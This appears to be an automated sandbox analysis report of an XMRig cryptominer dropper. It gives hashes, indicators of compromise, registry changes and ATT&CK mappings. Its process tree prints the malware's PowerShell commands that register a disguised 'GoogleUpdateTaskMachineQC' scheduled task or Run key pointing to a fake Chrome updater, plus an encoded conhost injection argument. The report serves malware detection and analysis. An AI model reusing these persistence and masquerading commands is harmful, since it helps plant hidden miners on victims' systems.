xmrig | 9533919643c9ba9f98177f54a24eb89c092266ee83c1237ee485d46fd3bca3b9

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-11-2024 16:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe
Size

2.0MB
MD5

b280cc4e78a7bff8d072713f8b4beb29
SHA1

76e5ab8eda5c292b4f602e8a73c037f4623cb172
SHA256

ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1
SHA512

51e8208fefa8cb51930468aa172f7b07056bf98281d7baf0108537fbab1291f1fc1826e708dec31f57432f7627eb2bccb3d05dc924b1e38f4b290ecb03c7861d
SSDEEP

49152:BMJt5dwHjwTFKLpVI1M5crh/XBSgqJXEjvZ80eYcZxXBkK8jXCv:Bot4DrVaEcugqJUDDcZl4C

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.execonhost.exe

description	pid	Process	procid_target
PID 2376 created 3420	2376	ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe	56
PID 2376 created 3420	2376	ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe	56
PID 4368 created 3420	4368	conhost.exe	56

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/772-71-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	xmrig
behavioral2/memory/772-70-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	xmrig
behavioral2/memory/772-73-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	xmrig
behavioral2/memory/772-75-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	xmrig
behavioral2/memory/772-77-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	xmrig
behavioral2/memory/772-79-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	xmrig
behavioral2/memory/772-81-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	xmrig
behavioral2/memory/772-83-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	xmrig
behavioral2/memory/772-85-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	xmrig
behavioral2/memory/772-87-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	xmrig
behavioral2/memory/772-89-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid	Process
5016	updater.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2492	powershell.exe
5104	powershell.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/772-63-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-71-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-70-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-73-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-75-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-77-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-79-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-81-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-83-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-85-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-87-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-89-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx
behavioral2/memory/772-91-0x00007FF76F120000-0x00007FF76F914000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

Processes:

ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.execmd.execmd.exe

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
4416	WMIC.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exe

pid	Process
2376	ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe
2376	ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe
5104	powershell.exe
5104	powershell.exe
2376	ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe
2376	ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe
3228	powershell.exe
3228	powershell.exe
2492	powershell.exe
2492	powershell.exe
4368	conhost.exe
4368	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe
772	conhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeIncreaseQuotaPrivilege	5104	powershell.exe
Token: SeSecurityPrivilege	5104	powershell.exe
Token: SeTakeOwnershipPrivilege	5104	powershell.exe
Token: SeLoadDriverPrivilege	5104	powershell.exe
Token: SeSystemProfilePrivilege	5104	powershell.exe
Token: SeSystemtimePrivilege	5104	powershell.exe
Token: SeProfSingleProcessPrivilege	5104	powershell.exe
Token: SeIncBasePriorityPrivilege	5104	powershell.exe
Token: SeCreatePagefilePrivilege	5104	powershell.exe
Token: SeBackupPrivilege	5104	powershell.exe
Token: SeRestorePrivilege	5104	powershell.exe
Token: SeShutdownPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeSystemEnvironmentPrivilege	5104	powershell.exe
Token: SeRemoteShutdownPrivilege	5104	powershell.exe
Token: SeUndockPrivilege	5104	powershell.exe
Token: SeManageVolumePrivilege	5104	powershell.exe
Token: 33	5104	powershell.exe
Token: 34	5104	powershell.exe
Token: 35	5104	powershell.exe
Token: 36	5104	powershell.exe
Token: SeIncreaseQuotaPrivilege	5104	powershell.exe
Token: SeSecurityPrivilege	5104	powershell.exe
Token: SeTakeOwnershipPrivilege	5104	powershell.exe
Token: SeLoadDriverPrivilege	5104	powershell.exe
Token: SeSystemProfilePrivilege	5104	powershell.exe
Token: SeSystemtimePrivilege	5104	powershell.exe
Token: SeProfSingleProcessPrivilege	5104	powershell.exe
Token: SeIncBasePriorityPrivilege	5104	powershell.exe
Token: SeCreatePagefilePrivilege	5104	powershell.exe
Token: SeBackupPrivilege	5104	powershell.exe
Token: SeRestorePrivilege	5104	powershell.exe
Token: SeShutdownPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeSystemEnvironmentPrivilege	5104	powershell.exe
Token: SeRemoteShutdownPrivilege	5104	powershell.exe
Token: SeUndockPrivilege	5104	powershell.exe
Token: SeManageVolumePrivilege	5104	powershell.exe
Token: 33	5104	powershell.exe
Token: 34	5104	powershell.exe
Token: 35	5104	powershell.exe
Token: 36	5104	powershell.exe
Token: SeIncreaseQuotaPrivilege	5104	powershell.exe
Token: SeSecurityPrivilege	5104	powershell.exe
Token: SeTakeOwnershipPrivilege	5104	powershell.exe
Token: SeLoadDriverPrivilege	5104	powershell.exe
Token: SeSystemProfilePrivilege	5104	powershell.exe
Token: SeSystemtimePrivilege	5104	powershell.exe
Token: SeProfSingleProcessPrivilege	5104	powershell.exe
Token: SeIncBasePriorityPrivilege	5104	powershell.exe
Token: SeCreatePagefilePrivilege	5104	powershell.exe
Token: SeBackupPrivilege	5104	powershell.exe
Token: SeRestorePrivilege	5104	powershell.exe
Token: SeShutdownPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeSystemEnvironmentPrivilege	5104	powershell.exe
Token: SeRemoteShutdownPrivilege	5104	powershell.exe
Token: SeUndockPrivilege	5104	powershell.exe
Token: SeManageVolumePrivilege	5104	powershell.exe
Token: 33	5104	powershell.exe
Token: 34	5104	powershell.exe
Token: 35	5104	powershell.exe
Token: 36	5104	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

powershell.execmd.exe

description	pid	Process	procid_target
PID 3228 wrote to memory of 3136	3228	powershell.exe	104
PID 3228 wrote to memory of 3136	3228	powershell.exe	104
PID 3140 wrote to memory of 4416	3140	cmd.exe	116
PID 3140 wrote to memory of 4416	3140	cmd.exe	116

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3420
- C:\Users\Admin\AppData\Local\Temp\ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe
  "C:\Users\Admin\AppData\Local\Temp\ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#grrqr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fwcaup#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3228
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:3136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#grrqr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2492
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe bjecouybve
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:4368
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:3140
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Detects videocard installed
    PID:4416
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:4040
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe dawljevacynemhmk 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnasCD7XnRLS04n/3PSQs4Y8p6xe1bGyOY+8Z8xp48QJueDeTETxFigw/gLPZY+zEogUGWJwIe0AnFUo5KGehIuSRD8LakQ2BzY76sQikKRo5YsnCeK/QrMiYGenOchYS4YmzB1SO5TDIHyuOuvYhgcxxFuuLlNJu0EGD3BPwarLoVEPwRT4xy6xyOSAVSH1wbSbPT0AK/BX0WsIoOE2qYBbW+WixLTgx7HjhKf0L4MRjwKSBvXZaWontgosxNwPppX9KP6jbKsfw7RDUuDo3lmia8ZSURXiB81FAoYkSLU7IBM0OymWsiXcl9u5srNjQA0k5GNYIMU+Fr+NfudwZ5jbqLyO1Fcpzprom2yaNY2GpW0EyVPrfNHarAXQ7RU0Of1LBbxblkg3LpJLPkqCsoF9v1d5xB21h7eDMgBuz7Q4hpHFL23KscuMzSbz1a80gIlw/62lQaY2MB6rC/wo0N8JLI5mh3ejpdCL2Fu3Uwdf3h2YDJHY49lSbf2BO3+0/sufm7JB2KrBZSJapq4f7Apf
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:772

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Executes dropped EXE
PID:5016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
2.0MB

MD5
b280cc4e78a7bff8d072713f8b4beb29

SHA1
76e5ab8eda5c292b4f602e8a73c037f4623cb172

SHA256
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1

SHA512
51e8208fefa8cb51930468aa172f7b07056bf98281d7baf0108537fbab1291f1fc1826e708dec31f57432f7627eb2bccb3d05dc924b1e38f4b290ecb03c7861d

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
00e7da020005370a518c26d5deb40691

SHA1
389b34fdb01997f1de74a5a2be0ff656280c0432

SHA256
a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

SHA512
9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
032ecfae3d898f4ba9779fea44d37004

SHA1
8b94484cc8f791b1c173eaac0bc5e6bd289c6a95

SHA256
711e7c2607a81517e905adf043981cb850bc65dbb2b1f0d4e2dd6c703fb7c38e

SHA512
13530538c0ac08c41931085805e76acc036fb18d02d40180593b73120e90027a8b4efabb95cda500a2a52fc4199f08c5f941f44609276add69eb6cdd557398da

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eaa4wb4y.mwc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/772-77-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-89-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-81-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-79-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-65-0x0000027198810000-0x0000027198830000-memory.dmp

Filesize
128KB

Download
memory/772-63-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-85-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-75-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-73-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-87-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-83-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-70-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-71-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/772-91-0x00007FF76F120000-0x00007FF76F914000-memory.dmp

Filesize
8.0MB

Download
memory/2376-20-0x00007FF662730000-0x00007FF662941000-memory.dmp

Filesize
2.1MB

Download
memory/2376-0-0x00007FF662730000-0x00007FF662941000-memory.dmp

Filesize
2.1MB

Download
memory/2492-59-0x000002D26F420000-0x000002D26F42A000-memory.dmp

Filesize
40KB

Download
memory/2492-58-0x000002D26F360000-0x000002D26F415000-memory.dmp

Filesize
724KB

Download
memory/2492-57-0x000002D26F340000-0x000002D26F35C000-memory.dmp

Filesize
112KB

Download
memory/2492-60-0x000002D26F590000-0x000002D26F5AC000-memory.dmp

Filesize
112KB

Download
memory/3228-23-0x00007FFE56170000-0x00007FFE56C31000-memory.dmp

Filesize
10.8MB

Download
memory/3228-22-0x00007FFE56170000-0x00007FFE56C31000-memory.dmp

Filesize
10.8MB

Download
memory/3228-24-0x00007FFE56170000-0x00007FFE56C31000-memory.dmp

Filesize
10.8MB

Download
memory/3228-37-0x00007FFE56170000-0x00007FFE56C31000-memory.dmp

Filesize
10.8MB

Download
memory/4368-74-0x00007FF69E210000-0x00007FF69E226000-memory.dmp

Filesize
88KB

Download
memory/4368-69-0x00007FF69E210000-0x00007FF69E226000-memory.dmp

Filesize
88KB

Download
memory/5016-38-0x00007FF611E10000-0x00007FF612021000-memory.dmp

Filesize
2.1MB

Download
memory/5016-64-0x00007FF611E10000-0x00007FF612021000-memory.dmp

Filesize
2.1MB

Download
memory/5104-18-0x00007FFE56170000-0x00007FFE56C31000-memory.dmp

Filesize
10.8MB

Download
memory/5104-15-0x00007FFE56170000-0x00007FFE56C31000-memory.dmp

Filesize
10.8MB

Download
memory/5104-14-0x00007FFE56170000-0x00007FFE56C31000-memory.dmp

Filesize
10.8MB

Download
memory/5104-13-0x00007FFE56170000-0x00007FFE56C31000-memory.dmp

Filesize
10.8MB

Download
memory/5104-12-0x00007FFE56170000-0x00007FFE56C31000-memory.dmp

Filesize
10.8MB

Download
memory/5104-2-0x0000023EBB890000-0x0000023EBB8B2000-memory.dmp

Filesize
136KB

Download
memory/5104-1-0x00007FFE56173000-0x00007FFE56175000-memory.dmp

Filesize
8KB

Download